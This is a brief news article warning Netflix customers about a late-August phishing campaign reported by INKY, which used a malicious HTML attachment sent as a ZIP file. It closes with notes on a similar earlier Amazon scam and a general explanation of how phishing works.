Netflix customers are being warned not to disclose any personally identifiable information on emails and SMS links sent to them by the video streaming firm, as the links and the impersonation is fake and a part of a fraudulent data harvesting campaign.
According to a report published by INKY, a cloud based email security service offering firm hackers launched a phishing scheme impersonating Netflix between August 21 and August 27 and started collecting sensitive details from customers.
The campaign saw a malicious HTML attachment passed as a ZIP file to targets and the social engineering attack was planned so convincingly that it easily convinced the victims to hand over their details.
Prima facie conducted by a forensic firm on request of Netflix discovered the origin of such emails from a Virtual Private Server functioning in Germany and then redirecting the traffic to a Peruvian University.
NOTE 1– Last year, a similar form of attack was planned to dupe the customers of Amazon during the thanksgiving and Christmas season. However, only a few online users fell prey to the campaign and so the loss was minimal.
NOTE 2- In a phishing attack, hackers try to convince the online users with a fabricated web page that impersonates a big company, often a technology or service providing firm. They email or SMS with a subject-line of account blockage and ask the target to immediately click on the link and fill in sensitive details in order to resume the service that has been paused.